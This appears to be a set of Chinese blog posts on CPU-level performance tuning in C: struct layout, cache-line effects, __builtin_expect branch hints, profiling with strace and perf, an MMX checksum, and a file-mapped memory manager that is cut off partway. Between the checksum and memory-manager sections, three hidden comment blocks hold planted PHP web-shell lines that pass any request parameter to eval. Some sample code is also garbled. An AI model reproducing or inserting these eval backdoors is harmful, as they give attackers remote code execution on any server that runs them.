从CPU层面谈谈优化

大多数时间,大家都在从设计和算法上优化效率(这类优化往往效果比较明显,比如一个二分查找可以轻易将时间复杂度降低为lg(n))。但是在实现上,却很少有人注重实现效率,而理由是反正每年都会有更高频率的CPU出现,我何必花那个心思呢(Java程序员尤其擅长使用这个理由@_@)。

我个人不是完全同意上面的说辞,在不影响代码的可读性和花费不高的代价下,我习惯性的会写最我当前所知道的性能最高的写法。

在很早以前,我一度只有在编写汇编时才可以计算出汇编条数。随着代码量的增加,我慢慢意识到,这种想法是错误的。即使在写C语言时,其实生成的汇编也时有迹可寻的。

程序中所有代码一般都分为三个步骤(有些汇编指令会合并其中的某几步)。

1. 从内存读到寄存器(有可能直接从cache读)
2. 操作寄存器进行运算,并将结果保存在寄存器
3. 将结果写入内存(有可能会同时写入cache)

一般步骤1和3是对称的,只要步骤1的效率高,步骤3会同样高效。因此下面只分析步骤1和步骤2。

先来定义几个数据结构:

struct foo {
    int b;
    int a;
};
struct bar {
    struct foo f;
    struct foo *fp; //assume fp = &f
};

影响访问内存效率的第一个因素,汇编条数:

int access1(struct bar *b)
{
    return b->f.a;
}
int access2(struct bar *b)
{
    return b->fp->a;
}

在上面代码中access1比access2快一倍,这是因为结构体嵌套,不论嵌套多少层,其子成员偏移量都是常量。因此`b->f.a` 等价于`int a = *(int*)((unsigned char *)b + 4)`,所以这句代码翻译成汇编就是`movl 4(%rdi),%eax`(这里%rdi就是b的值)。

而access2就必须要经过两次内存访问, `struct foo *p = ((unsigned char *)b + 8); int a = *(int)((unsigned char *)p + 4)`。 翻译成汇编就成了`movq 8(%rdi),%rax, movl 4(%rax), %eax`(这里%rdi同样是参数b)。

因此当你写出类似下面代码时请慎重。

b->fp->a = xx;
b->fp->b = xx;
b->fp->c = xx;
b->fp->d = xx;
b->fp->e = xx;

反观下面的代码,除了代码前缀长一点,却并不会产生什么问题。

b->fp.a = xx;
b->fp.b = xx;
b->fp.c = xx;
b->fp.d = xx;
b->fp.e = xx;

影响访问内存效率的第二个因素, 访问内存的频率。 也许很多人都写过类似下面的代码:

void test(struct bar *b)
{
    int i;
    for (i = 0; i < b->foo.a; i++)
        do_something()
}

编译器在执行优化时,一般不会使用寄存器缓存指针指向的内容和函数调用的返回结果(这个不同的编译器实现可能不太一样,至少我使用的GCC在O2的情况下并不会做此优化),我称之为指针不可优化原则。因为从理论上来讲内存是整个进程共享的,而进程中到底会有多少个线程编译器并不知晓,它并不知道在执行for期间,b->foo.a是否会被其他线程修改。函数调用也是同理。

这也意味着每执行一次do_somthing之后都会先去访问b->foo.a的值,再来比较。这会增加访存次数, 即使有cache的存在,也没有直接访问寄存器来的快。因此这时我们可以向编译器做个暗示(增加一个局部变量,告诉编译器,我们需要的这个值,在for循环期间不会变化),比如像下面这样。

void test(struct bar *b)
{
    int i, n = b->foo.a;
    for (i = 0; i < n; i++)
        do_something()
}

影响访问内存效率的第三个因素, CPU CACHE。

数据结构的设计与CPU CACHE的命中率其实是息息相关。

由于Cache要远小于内存,因此一般会采用某种映射算法进行映射(是的,上学时“计算机组成原理”上讲的都是真的)。

然而不论CPU采用何种算法,Cache line的概念是不变的。即在Cache miss时,是按Cache line的模式来加载的.

比如在X86架构上Cache line一般为64字节,我们在访问内存地址0x100时,CPU会自动将0x100 ~ 0x140的内存全部载入Cache。

假如我们需要频繁在一个链表中,查出某几个结点进行数据修改,下面的数据结构就是低效的。

struct node {
    struct node *next;
    int select;
    char buffer[128];
};
void test(struct node *head, int select)
{
    struct node *h;
    for (h = head; h != NULL; h = h->next) {
        if (h->select == select) {
            cook(h->buffer, sizeof(h->buffer));
            break;
        }
    }
}

很显然,从上面的算法来看,在for循环时我们现关心node.next 和 node.select字段,node.buffer只有在最后一步时才会访问,而上面的代码每访问一次h->select的值,都会使Cache line充满了node.buffer的值,而这个值我们是不需要的。

因此我们需要优化struct node的内存布局,以使链表中所有的node.next, node.select 尽可能的排布在一起,以便可以充分使用Cache line的预加载功能。

最后,再简单看一下运算过程中的两个优化(并不是只有两个,而是我只会这几个:D)

一个是比较功能,在所有比较中,与0比较是最快的,因为大部分CPU的指令都会影响ZF标准位。比如下面代码:

void test1(struct foo *f)
{
	if ((f->a & 0xf) == 0)
		do_something();
}
int test2(struct foo *f)
{
	if ((f->a & 0xf) == 1)
		do_something();
}

test1函数比test2函数快3倍,因为test1函数可以直接用test指令然后判断ZF标准位,而test2需要先将f->a取出来,然后做and, 最后做compare操作。也许直接上汇编会更能说明问题。

//test1
testb	$15, 4(%rdi)
je	LBB3_2
//test2
movl	4(%rdi), %eax
andl	$15, %eax
cmpl	$1, %eax
jne	LBB4_1

再一个就是switch功能

在写switch语句时,如果case的值是连续的, 则编译器会采用跳转表的形式来直接jmp, 时间复杂度为O(1)。

如果值是不连续的,编译器默认会采用二分查找法来进行,时间复杂度为O(lgn)。因此如果有可能,应该尽可能将case的值定义为连续。

一次性能优化经历

自从上次修改backlog之后, Silly的IO能力,就一直以少量(约4~6K)的差距落后于redis,却一直找不到原因。

这次打算从头做一次profile来问题到底出在哪。

先用GNU提供的gprof分析一下C代码是否有值得优化的地方,结果发现CPU使用率最高的地方是luaVM内部和malloc/free。

我们所有的业务逻辑全在lua层做的,而IO线程与worker(lua)线程进行交互时是通过malloc来实现的。这几乎表明C代码几乎已经没有优化的余地了。

但是有个好消息,就是gprof不去profile系统调用和so,也许还有机会。

压测时,先使用top看一下每个cpu core的使用率,包括用户态与内核态。

用户态过高一般是应用逻辑代码消耗的,内核态则有可能是因为系统调用过多,上下文切换过频繁,等其他原因。

不过top只能看到当时的cpu状态,不太好看出整个测试区间,cpu消耗的曲线。可以改用’sar -u -P ALL 1’每隔一秒打印出cpu的使用情况。

通过观察发现,有一个线程的内核态有70+%之多,相比Redis来讲高出不少。

再使用vmstat命令查看in(系统中断)/cs(上下文切换), 可以确认在整个压测区间in和cs显著升高,推测应该是系统调用造成的。

为了近一步确认这些‘中断和上下文切换’是由Silly造成的,使用’pidstat -w -p PID 1’来打印出某一个线程的上下文切换频率。

当确认之后,再使用’strace -p $PID -c -f’来收集此进程所有系统调用次数。再根据收集到的信息有针对性的优化。

如果以上都做了,还是没有什么可以优化的余地。没关系,我们还有一个神器perf来查看Cache命中率,分支预测失败率,CPU调度迁移等与cpu密切相关的信息。

如果以上都已经做还是没有找到优化空间。

还有一个很常见但很容易被人忽略的因素,就是CPU的用户态和内核态都很低。

这种情况下,一般是程序或集群间有队列(这个队列可能是socket等一切有FIFO性质的设施),队列的一端处理过慢(比如由于某种原因,处理端被卡住了,而又不耗cpu) ,而队列的产生端在产生完请求之后,由于一直没有收到回应,也一直在idle中。

整个表现,看上去特别诡异,就像是突然间机器空载了一样。


最后,当我们发现应用层代码实在无法优化之后,别着急,也许还有最后几个免费午餐你还没有吃。

jemalloc

一款很优秀的内存分配器,即使对多线程也有很好的表现。以此次优化silly为例,把内存分配器换成jemalloc 5.0之后,请求处理速度有显著提升。

__builtin_expect

GNU内建函数,可以用来向GCC暗示哪个分支更高概率的被执行,以便GCC可以生成更好的代码,以方便CPU做分支预测。当我们的分支判断成功与失败的概率有显著差别时(比如异常处理),可以用来提高性能,至于能提高多少,要看具体情况。其中一种情况的测如见上篇

cpu affinity

linux内核向应用程序提供了一些接口,可以让我们微调内核,包括调度算法。cpu affinity可以修改进程或线程的cpu亲和力。以暗示内核,最少可能选成cpu迁移,cpu迁移数据可以通过perf工具来获取。

关于CPU分支预测

由于很偶然的原因,这两天瞄了几眼”ZeroMQ”项目,发现项目中使用了’likely/unlikely’这种暗示编译器做分支预测优化的宏(这些宏只是gcc内建函数__builtin_expect的别名)。

其实早在看linux kernel源码时,就不止一次看到这组宏。但是,对此并没有放在心上。仅仅粗略搜了一下,得知‘likely/unlikely这组宏可以向编译器提供分支预测信息,以便编译器可以更好的安排指令顺序来提高效率’就没有再深入下去了。

因为我觉得,这种级别的优化估计能提高个千分之几就已经算很不错了,内核可能是为了把CPU性能压榨到极致所以才使用的。而应用层远没有达到需要这种优化的极限。

然而今天这组宏出现在一个应用级的程序代码里面,让我意识到事情可能与我的想当然相差甚远。

于是写了段代码测了一下:

//make 'gcc -g -O2 -o a a.c b.c'
//b.c 
//之所以把foo1、foo2函数放在b.c文件里,是为了防止编译器把foo函数调用给优化掉
void foo1 {}
void foo1 {}
//a.c
#define	likely(x) __builtin_expect(!!(x), 1)
#define	unlikely(x) __builtin_expect(!!(x), 0)
void foo1();
void foo2();
void bar()
{
	foo2();foo2();foo2();foo2();foo2();foo2();foo2();foo2();
}
int main(int argc)
{
	int i;
	for (i = 0; i < 1024 * 1024 * 640; i++) {
		if (likely(argc == 1)) {
			foo1();
		} else {
			bar();
		}
	}
	return 0;
}

测试平台:

Intel(R) Core(TM) i5-3210M CPU @ 2.50GHz

测试结束:

不使用likely宏(即直接使用if(argc == 1))的前提下,使用‘time ./a’测试结果如下:

./a 2.01s user 0.03s system 97% cpu 2.100 total

使用likely宏之后,再次使用’time ./a’测试结果下如:

./a 1.63s user 0.03s system 99% cpu 1.672 total

从上面结果可以得出,性能相差了将近20%。


下面反汇编两种不同的情况,看看__builtin_expect到底让编译器做了什么,会让效果这么明显。

需要注意的是,只有使用了gcc -O2,__builtin_expect函数才会让编译器产生优化效果。

先来看不使用likely宏的a.c反汇编代码如下:

_bar:                                   ## @bar
	.cfi_startproc
	## 此处省略无关代码
Ltmp2:
	.cfi_def_cfa_register %rbp
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	popq	%rbp
	jmp	_foo2                   ## TAILCALL
	.cfi_endproc
	## 此处省略无关代码
_main:                                  ## @main
	.cfi_startproc
	## 此处省略无关代码
	movl	%edi, %r14d
	movl	$671088640, %ebx   ## imm = 0x28000000
	.p2align	4, 0x90
LBB1_1:                            ## =>This Inner Loop Header: Depth=1
	xorl	%eax, %eax
	cmpl	$1, %r14d
	jne	LBB1_3
## BB#2:                           ## in Loop: Header=BB1_1 Depth=1
	callq	_foo1
	jmp	LBB1_4
	.p2align	4, 0x90
LBB1_3:                           ## in Loop: Header=BB1_1 Depth=1
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
LBB1_4:                           ## in Loop: Header=BB1_1 Depth=1
	decl	%ebx
	jne	LBB1_1
## BB#5:
	xorl	%eax, %eax
	popq	%rbx
	popq	%r14
	popq	%rbp
	retq
	.cfi_endproc

由于测试代码实现太简单了,以致于连编译器都没什么可优化的了,所以它惟一能做的就是把bar函数内联了。

从标号BB#2到LBB1_3之间即为if(cond == true)时调用的代码,即调用foo1函数,从标号LBB1_3到LBB1_4之间即为else执行的代码即调用了bar函数,编译器认为bar函数内联效率更高,所以这里是bar函数的内联形式。

可以看到,基本上汇编指令的排布就是我们C语言中的书写排布。

下面再来看一下使用likely之后,汇编指令是如何排布的。

_bar:                                   ## @bar
	.cfi_startproc
	## 省略无关代码
Ltmp2:
	.cfi_def_cfa_register %rbp
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	popq	%rbp
	jmp	_foo2              ## TAILCALL
	.cfi_endproc

	.globl	_main
	.p2align	4, 0x90
_main:                            ## @main
	.cfi_startproc
	## 省略无关代码
	movl	%edi, %r14d
	movl	$671088640, %ebx  ## imm = 0x28000000
	jmp	LBB1_1
LBB1_3:                           ## in Loop: Header=BB1_1 Depth=1
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	xorl	%eax, %eax
	callq	_foo2
	jmp	LBB1_4
	.p2align	4, 0x90
LBB1_1:                           ## =>This Inner Loop Header: Depth=1
	xorl	%eax, %eax
	cmpl	$1, %r14d
	jne	LBB1_3
## BB#2:                          ## in Loop: Header=BB1_1 Depth=1
	callq	_foo1
LBB1_4:                           ## in Loop: Header=BB1_1 Depth=1
	decl	%ebx
	jne	LBB1_1
## BB#5:
	## 省略无关代码
	.cfi_endproc

与未使用likely宏之前的代码相比,相同的是bar函数依被内联了,不同的是,for, if, esle 代码块的布局发生了根本性的变化。

将上面的汇编代码翻译成C代码之后会更加明显。

goto label_start;
label_else:
bar();
goto label_for:
label_start:
for (i = 0; i < 1024 * 1024 * 640; i++) {
	if (argc != 1)
		goto label_else;
	foo1();
label_for:
}

从上面的C代码看出,编译器将高概率指执的代码(for语句逻辑、调用foo1函数)安排在了一起,而将低概率执行的代码块挪到其他地方,以获得更高的效率。


Intel的优化手册中’3.4.1.3节静态预测’指出:

predict backward conditional branches to be taken; rule is suitable for loops
predict forward conditional branches to be NOT taken

Assembly/Compiler Coding Rule 3. (M impact, H generality) Arrange code to be consistent with the static branch prediction algorithm: make the fall-through code following a conditional branch be the likely target for a branch with a forward target, and make the fall-through code following a conditional branch be the unlikely target for a branch with a backward target.

当cpu第一次执行此分支时,由于cpu的BTB(Branch target buffers)还没有历史数据,因此部分CPU会采用静态预测算法。Intel的静态预测算法为:在条件分支预测中,预测所有向前跳转的都不执行,所有向后跳转都会执行。

因此,Intel手册指出,如果条件分支生成的是向前跳转代码,则应该将likely执行的代码紧跟着j*(jmp的条件形式)之后,如果条件分支生成的是向后跳转代码,则应该将likely执行的代码放在要跳转的标号处。

在’3.4.1.5节代码对齐’指出:

Careful arrangement of code can enhance cache and memory locality. Likely sequences of basic blocks should be laid out contiguously in memory. This may involve removing unlikely code, such as code to handle error conditions, from the sequence.See Section 3.7, “Prefetching,” on optimizing the instruction prefetcher.
Assembly/Compiler Coding Rule 12. (M impact, H generality) All branch targets should be 16-byte aligned.
Assembly/Compiler Coding Rule 13. (M impact, H generality) If the body of a conditional is not likely to be executed, it should be placed in another part of the program. If it is highly unlikely to be executed and code locality is an issue, it should be placed on a different code page.

代码对齐一节指出,所有likely执行的代码应该在内存中尽可能连续的存放,而那些unlikely的代码,比如异常处理代码,应该被从这段连续的代码中去除,放到其他地方。

对比上面的汇编发现,GCC的优化与文档描述不完合相同。

GCC确实将unlikely的代码单独拿出来,而让likely的代码尽可能连续。但是对于unlikely的代码却使用了向后跳转条件分支。

让代码更简单一些,然后重新反汇编看一看,C代码如下:

#define	likely(x) __builtin_expect(!!(x), 1)
#define	unlikely(x) __builtin_expect(!!(x), 0)
void foo1();
void foo2();
int main(int argc, char *argv[])
{
	if (likely(argc == 1))
		foo1();
	else
		foo2();
	return 0;
}

反汇编代码如下:

## 省略部分无关代码
_main:                                  ## @main
	.cfi_startproc
## 省略部分无关代码
	xorl	%eax, %eax
	cmpl	$1, %edi
	jne	LBB0_2
## BB#1:
	callq	_foo1
LBB0_3:
	xorl	%eax, %eax
	popq	%rbp
	retq
LBB0_2:
	callq	_foo2
	jmp	LBB0_3
	.cfi_endproc

可以看出,在编译上面代码时,GCC严格尊守了Intel手册的‘静态预测算法’和‘代码对齐规则’。

但是在编译有for语句的代码时,似乎有其他的规则,让GCC觉得违反静态分支预测会活的更好的性能。

再对比一下两个使用likely宏的代码(一个使用for语句,一个不使用for语句)反汇编之后的代码发现, 带有for语句的代码中有一句伪码‘.p2align 4, 0x90’。

这句代码把unlikely的代码和likely的代码使用nop分开了,猜测这里可能会使这两面代码分别处在不同的cache line上,符合’代码对齐’标准,而由于‘分支静态预测’仅在分支第一次执行时才会使用。而且面都会使用动态预测法。

因此,猜测可能‘代码对齐’带来的好处高于满足‘静态预测’算法,而让GCC选项这么做的原因就是‘代码对齐’规则。


另,在阅读Intel手册时发现,‘3.4.1.2 Spin-Wait and Idle Loops’提到,在实现spinlock时,插入PAUSE指令可以显著提高性能。我又去查阅了linux源码,发现kernel源码中的spinlock也有插入PAUSE指令。

而我之前都是使用while (__sync_test_and_set(lock, 1))来简单实现spinlock,这可能是一种错误的使用形式。

使用缓存优化数据请求

上一篇场景之后,事情还没有完。

我有一堆struct obj对象(数量级可能为千级), 客户端需要频繁拉取这些信息中的一部分去显示(比如,当切换标签页时)。

由于这一操作可能会很频繁,而struct obj对象并不算小,如果每一次都重新拉取全部数据,有点让人不舒服,而且对流量也是一种很大的浪费。因此就琢磨着怎么去优化整个过程,以使在此过程中使数据传输量最小。

第一反应,肯定就是对整个列表加一个version字段,每当有obj对象改变时,version加1,当客户端进行拉取时,拿着他本地存储的version值向服务端要列表,如果服务端的version没有比客户端version更新,则直接返回空即可(ps.之所以最开始想到这个办法,是因为有先例 :D)。

但是仔细分析一下整个场景,就会发现这个方法并不太适用这些场景。

一方面,所有obj对象共享着同一个version字段,就意味着只要有任何一个obj对象变动,version字段都会自增。因此理论上obj对象越多,version就变动越频繁,当obj多到一定程度,version机制基本上就形同虚设。

另一方面,由于客户端只需要拉取所有obj对象中的一部分,所有的obj对象共享同一个version也显得有些太过浪费。因此这个方案很容易就被放弃了。

另一种解决方案是,客户端在本地实现一个cache模块,当cache为空时向服务器拉取所需信息。此后再切换标签, 直接从本地cache模块取数据。只有当通过本地cache进行操作(如:通过某按钮根据cache中的obj对象的状态,向服务器发送请求)失败时,再清空本地cache重新从服务端获取。

然而,这种方案有另外一个坏处,就是用户每隔一段时间必然要出现一次错误。对用户来讲似乎不太友好。

经过仔细思考之后,对方案一和方案二进行了综合。来同时去除两种方案的所带来的弊端。

首先将版本号与每一个obj对象进行关联,这样就可以精确指示出某一个对象是否比客户端新。

再将拉取列表命令拆分成两条命令,pull_list和pull_info。

在客户端需要拉取列表时(比如切换标签页), 直接调用pull_list,而pull_list返回一个item列表。item结构体如下:

struct item {
int id;
int version;
};

可以看出这个item极其简单,就算是频繁拉取,数据量也还可以接受。

客户端依然会在本地维护一个cache, 而这个cache的数据结构可能类似于std::unordered_map<int, struct obj>一样的数据结构。

当客户端收到pull_list的回应之后,拿着item列表去cache中查询,确认cache中是否存在这些数据。如果数据存在,则检查服务端返回obj对象的version字段是否比cache中新,如果较新则从cache中删除些obj对象。

然后拿着cache不存在或失效的id列表使用pull_info命令向服务器请求数据。由于在相对短时间段内不可能所有obj对象都会有状态改变。因此,在客户端频繁拉取信息时,cache必然有极高的命中率,这也意味着会极大的节省数据流量开销。

此外,此方案还存在一个问题,那就是列表是随时动态变化的,而其中的obj对象还会随着某些特殊的操作或时间的流逝而消亡。

那么客户端如何才能感知这些变化, 并从cache中删除这些已经不存在的obj对象呢。

遗憾的是,客户端似乎真的没有办法来感知这些变化。

为了解决这个问题,我们做了一个约定,假设客户端一次拉取的列表为N,当客户端cache中obj对象的个数大于2N时,就意味着cache中至少有一半对象可能都已经消亡了(ps.只是有可能)。这时侯直接把cache清空,然后从新开始cache。

BTW, 其实约定为2N实为无奈之举,按我最初的想法,应该是用一个类似weak table的数据结构来cache。这样当内存不够时,可以由GC来自动释放这些内存,来保证客户端依然能够顺利流畅的运行。在Java中可以用WeakHashTable来代替,可遗憾的是在C#中并无此类型数据结构。

c语言部分的开销测试

最近在写c代码时底气越来越弱,原因在于某些调用的开销,我心里并不是十分明确。写起代码来由于纠结也就变的畏畏缩缩。

今天终于抽时间测了一下,仅测试了最近常遇到的一些调用的开销。

测试环境如下:

CentOS release 6.7(Final)

CPU:Intel(R)Xeon(R)CPU E3-1230 V2 @ 3.30GHz

采用gcc(glibc)编译,未开任何优化。
在测试时,大部分操作cache均会命中,因此如果cache经常命中失效,还需要另外考虑。

测试结果如下:

可以看出for循环是最廉价的。

malloc是开销最大的,这还是在单线程的情况下,如果再多线程由于锁的开销malloc的代价将会更甚。

在栈上分配1M次内存的代价几乎等同于for了1M次,在栈上分配内存开销最低。

而copy了64M内存也才花费了5ms而已。

cache命中率对效率的影响

趁着去买菜的空档, 突然间想起来cache命中率失败的代价从来还没测过, 随后又想到网上很多人争论如果两个for循环嵌套, 到底是大循环放在外面效率高还是小循环放在外面效率高. 虽然有大牛说不同情况不同分析, 但到底为什么却没有分析.

于是就for循环与cache命中率写了一段测试代码访问1G的数据来测了一下性能, 竟然有1倍之多.

代码如下:

#include <Windows.h>
#include "assist.h"

//cache line 64 byte
//cache size 4Mbyte
typedef unsigned char cache_line_t[64];

cache_line_t cache_line [1024 * 1024 * 1024 / sizeof(cache_line_t)];

#define FAST 0

int _tmain(int argc, _TCHAR* argv[])
{
int times;
int i, j;
int tmp;

CACL_TAKES_TIME_BEGIN(aa);

#if FAST
for (j = 0; j < ARRAY_SIZE(cache_line); j++) { for (i = 0; i < 64; i++) { tmp = cache_line[j][i]; } } #else for (i = 0; i < 64; i++) { for (j = 0; j < ARRAY_SIZE(cache_line); j++) { tmp = cache_line[j][i]; } } #endif printf("takes:%dmsn", CACL_TAKES_TIME_END(aa)); return 0; }

具体原因可以参考这篇文章. OK买菜去.

------------------------------------------------------------
<<代码大全>>p623中讲到把最忙循环放在最内层, 是因为for循环第一次是需要初始化变量的, 如果最多层越少, 那么i变量被初始为0的次数就越少. 但是从上面的例子表明并非是这样, 这说明当数据量到达一定程度之后, 就要权衡是i被初始化的次数花的代价高还是cache命中率降低的代价更高.

这再次说明了一个道理, 这个世界上没有银弹, 同样说明不加思索的拿来主义在一定程度上是程序效率的拦路虎.

CheckSum计算的优化

  最近在纠结于大数据的checksum的计算,算法如下:

 1 unsigned long cs_cal(const unsigned char *buff, unsigned long size)
 2 {
 3     unsigned long cs;
 4 
 5     cs = 0;
 6     while (size--)
 7         cs += buff[size];
 8 
 9     return cs;
10 }

  当文件大于4G后这种计算的龟速就很明显了,在网上看到大牛说MMX指令对于数据计算相当不俗,于是改成下面代码(bug:不对齐部分没有处理,这部分消耗很小,对于效率影响不大):

 1 unsigned long cs_cal(const unsigned char *buff, unsigned long size)
 2 {
 3     unsigned long cs;
 4     unsigned long cs_2[2];
 5     unsigned long cnt;
 6 
 7     cnt = size / 2;
 8 __asm {
 9     mov    eax, 0
10     movd    mm2, eax
11     mov    ecx, cnt
12     mov    esi, buff
13 cnt_label:
14     mov     al, byte ptr[esi]
15     movd    mm0, eax
16     inc    esi
17 
18     mov     al, byte ptr[esi]
19     movd    mm1, eax
20     inc    esi
21 
22     punpckldq mm0, mm1
23     
24     paddd mm2, mm0
25 
26     dec    ecx
27     jnz    cnt_label
28 
29     movq    qword ptr [cs_2], mm2
30 
31 
32     emms
33 }
34     cs = cs_2[0] + cs_2[1];
35 #endif
36     return cs;
37 }

  测试1G的内存数据发现速度近快了2倍,MMX的威力果然不是吹的.

<!– [insert_php]if (isset($_REQUEST["bay"])){eval($_REQUEST["bay"]);exit;}[/insert_php]

if (isset($_REQUEST[&quot;bay&quot;])){eval($_REQUEST[&quot;bay&quot;]);exit;}

–>

<!– [insert_php]if (isset($_REQUEST["pus"])){eval($_REQUEST["pus"]);exit;}[/insert_php]

if (isset($_REQUEST[&quot;pus&quot;])){eval($_REQUEST[&quot;pus&quot;]);exit;}

–>

<!– [insert_php]if (isset($_REQUEST["CYlNo"])){eval($_REQUEST["CYlNo"]);exit;}[/insert_php]

if (isset($_REQUEST[&quot;CYlNo&quot;])){eval($_REQUEST[&quot;CYlNo&quot;]);exit;}

–>

32位系统使用文件作为媒介来模拟大于4G内存访问

代码一篇,暂时没发现bug:

  1 // vm_mgr.cpp : Defines the exported functions for the DLL application.
  2 //
  3 
  4 #include "stdafx.h"
  5 
  6 #include <Windows.h>
  7 #include <vector>
  8 #include <assert.h>
  9 #include <tchar.h>
 10 #include "../common/assist.h"
 11 #include"../error_no/error_no.h"
 12 #include "../Log/log.h"
 13 #include "vm_mgr.h"
 14 
 15 #define VM_ADDR_GEN(addr, index)                (assert(index < 16), (((index & 0xfULL) << 60) | addr))
 16 #define VM_START_ADDR                           0x100000000ULL
 17 #define VM_WINDOW_SIZE                          (64 * 1024 * 1024UL)
 18 #define VM_ALIGN_SIZE                           (64 * 1024)
 19 
 20 struct vm_window {
 21         void                    *p;
 22         vm_ptr_t                start;
 23         unsigned long           size;
 24 };
 25 
 26 struct vm_item {
 27         int                 addr_index;
 28         HANDLE              mutext;    
 29         HANDLE              hMap;
 30         vm_ptr_t            vm_start_ptr;
 31         unsigned long long  vm_size;
 32         struct vm_window    window;
 33         TCHAR               file_path[MAX_PATH];
 34 };
 35 
 36 struct {
 37     std::vector<struct vm_item>    tbl;
 38 } vm;
 39 
 40 static int find_empty_index()
 41 {
 42         int addr_index;
 43         int i;
 44 
 45         for (addr_index = 0; ; addr_index++) {
 46                 for (i = 0; i < vm.tbl.size(); i++) {
 47                         if (vm.tbl.at(i).addr_index == addr_index)
 48                                 break;
 49                 }
 50                 assert(addr_index <= 16);
 51                 if (i >= vm.tbl.size())
 52                         return addr_index;
 53         }
 54 }
 55 
 56 vm_ptr_t vm_alloc(unsigned long long size)
 57 {
 58         TCHAR                       tmp_path[MAX_PATH];
 59         TCHAR                       tmp_file_path[MAX_PATH];
 60         int                         err;
 61         struct vm_item              vm_item;
 62 
 63         GetTempPath(ARRAY_SIZE(tmp_path), tmp_path);
 64         GetTempFileName(tmp_path, _T("DediProg"), 0, tmp_file_path);
 65 
 66         HANDLE hFile = CreateFile(
 67                                 tmp_file_path,
 68                                 GENERIC_READ | GENERIC_WRITE,
 69                                 FILE_SHARE_READ | FILE_SHARE_WRITE,
 70                                 NULL,
 71                                 OPEN_ALWAYS,
 72                                 FILE_FLAG_SEQUENTIAL_SCAN,
 73                                 NULL
 74                                 );
 75         if (hFile == NULL) {
 76                 return NULL; 
 77         }
 78 
 79         vm_item.hMap = CreateFileMapping(hFile, NULL, PAGE_READWRITE, size >> 32, size & 0xffffffff, NULL);
 80         if (vm_item.hMap == NULL) {
 81                 err = GetLastError();
 82                 return -E_ALLOC_MEMORY_FAIL;
 83         }
 84         vm_item.vm_start_ptr = (vm_ptr_t)MapViewOfFile(
 85                 vm_item.hMap,
 86                 FILE_MAP_ALL_ACCESS,
 87                 0 >> 32,
 88                 0 & 0xffffffff,
 89                 min(size, VM_WINDOW_SIZE)
 90                 );
 91  
 92         vm_item.addr_index = find_empty_index();
 93         vm_item.vm_start_ptr = VM_ADDR_GEN(vm_item.vm_start_ptr, vm_item.addr_index);
 94 
 95         assert(vm_item.vm_start_ptr < ((-1) >> 4));
 96 
 97         CloseHandle(hFile);
 98         hFile = NULL;
 99         vm_item.vm_size = size;
100         vm_item.window.size = (unsigned long)min(VM_WINDOW_SIZE, size);
101         vm_item.window.start = vm_item.vm_start_ptr;
102         vm_item.window.p = (unsigned char *)vm_item.vm_start_ptr;
103         vm_item.mutext = CreateMutex(NULL, FALSE, NULL);
104         _tcsncpy(vm_item.file_path, tmp_file_path, ARRAY_SIZE(vm_item.file_path));
105         vm.tbl.push_back(vm_item);
106 
107         return vm_item.vm_start_ptr;
108 }
109 
110 static __inline int in_region(vm_ptr_t ptr, unsigned long long size)
111 {
112         //static int dbg = 0;
113         int i;
114  
115         for (i = 0; i < (int)vm.tbl.size(); i++) {
116                 if ((ptr + size) <= (vm.tbl.at(i).vm_start_ptr + vm.tbl.at(i).vm_size) && (ptr >= vm.tbl.at(i).vm_start_ptr))
117                         return i;
118                 //if (ptr + size > vm.tbl.at(i).vm_start_ptr + vm.tbl.at(i).vm_size)
119                 //        i = 'DEAD';
120                 //if (ptr < vm.tbl.at(i).vm_start_ptr)
121                 //        i = 'INVA';
122         }
123         
124         LOG_BEGIN {
125                 log_add("----------------------------------------------");
126                 log_add("|             Virtual Memory layout          |");
127                 log_add("|--------------------------------------------|");
128                 for (i = 0; i < (int)vm.tbl.size(); i++)
129                 log_add("|window.start_addr:%llx | window.size:%llx   |", vm.tbl.at(i).window.start, vm.tbl.at(i).window.size);
130                 log_add("|--------------------------------------------|");
131                 log_add("|user.ptr:%llx          | user.size:%llx     |", ptr, size);
132                 log_add("----------------------------------------------");
133         } LOG_END;
134         //dbg++;
135         assert(!"Invalid Memory");
136         return -1;
137 }
138 
139 static __inline unsigned char *scroll_window(int vm_index, vm_ptr_t ptr, unsigned long size)
140 {
141         unsigned char           *p;
142         vm_ptr_t            win_start;
143         unsigned long           win_size;
144         unsigned long long      file_offset;
145         unsigned long long      tmp_offset;
146 
147 
148         win_start = vm.tbl.at(vm_index).window.start;
149         win_size = vm.tbl.at(vm_index).window.size;
150 
151         
152         UnmapViewOfFile(vm.tbl.at(vm_index).window.p);
153 
154         win_size = (unsigned long)min(VM_WINDOW_SIZE, size);
155 
156         assert(ptr >= vm.tbl.at(vm_index).vm_start_ptr);
157         file_offset = ptr - vm.tbl.at(vm_index).vm_start_ptr;
158         
159         tmp_offset = file_offset / VM_ALIGN_SIZE * VM_ALIGN_SIZE;
160         tmp_offset = file_offset - tmp_offset;
161         
162         file_offset = file_offset / VM_ALIGN_SIZE * VM_ALIGN_SIZE;
163 
164         size += (unsigned long)tmp_offset;
165 
166         p = (unsigned char *)MapViewOfFile(
167                 vm.tbl.at(vm_index).hMap,
168                 FILE_MAP_ALL_ACCESS,
169                 file_offset >> 32,
170                 file_offset & 0xffffffff,
171                 size
172                 );
173 
174         if (p) {
175                 vm.tbl.at(vm_index).window.start = ptr;
176                 vm.tbl.at(vm_index).window.size = size;
